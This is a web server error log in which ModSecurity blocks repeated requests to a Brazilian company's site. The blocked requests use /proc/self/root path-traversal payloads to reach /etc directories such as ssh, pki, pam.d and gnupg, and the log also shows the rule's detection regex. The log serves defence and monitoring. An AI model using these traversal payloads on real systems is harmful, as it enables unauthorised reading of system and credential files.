[Mon Mar 16 11:09:05.700294 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:38160] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPAbysWC90G-1nBrA7YAAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:05.716568 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:53402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPAf9ocpUE4ed4uDzklAAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:07.084549 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:53412] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPAwlT9VtDQc7bgUykUQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:08.439398 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:53414] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPBNSswJuvopo3lOhWvgAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:09.571925 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:53430] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPBbysWC90G-1nBrA7YQAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:10.838502 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.243.203:35052] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPBglT9VtDQc7bgUykVgAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:12.184928 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:35064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPCAlT9VtDQc7bgUykWQAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:12.707466 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.241.46:38172] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPCAlT9VtDQc7bgUykWgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:13.475686 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.243.203:35072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPCQlT9VtDQc7bgUykWwAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:14.778597 2026] [:error] [pid 10709:tid 140411557287680] [client 74.7.243.203:35076] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPChXjF1vJNtV6CWrujAAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:16.081803 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:35088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPDLABkC4fWIHEf8HieAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:17.422575 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:35104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPDbysWC90G-1nBrA7ZwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:18.778877 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.243.203:35120] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPDhXjF1vJNtV6CWrujQAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:19.520542 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:55248] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPD7ysWC90G-1nBrA7agAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:09:20.075356 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.243.203:35124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPELysWC90G-1nBrA7awAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:20.570647 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:40696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPELysWC90G-1nBrA7bAAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:22.224309 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:40702] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPErABkC4fWIHEf8HieQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:23.769562 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.243.203:40718] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPExXjF1vJNtV6CWrujgAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:25.048785 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:49948] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPFf9ocpUE4ed4uDzkmQAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:09:25.279368 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:40724] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPFdSswJuvopo3lOhWwAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:26.822643 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.243.203:40726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPFnbQATo66fKoS7xFGgAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:28.372932 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.243.203:40736] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 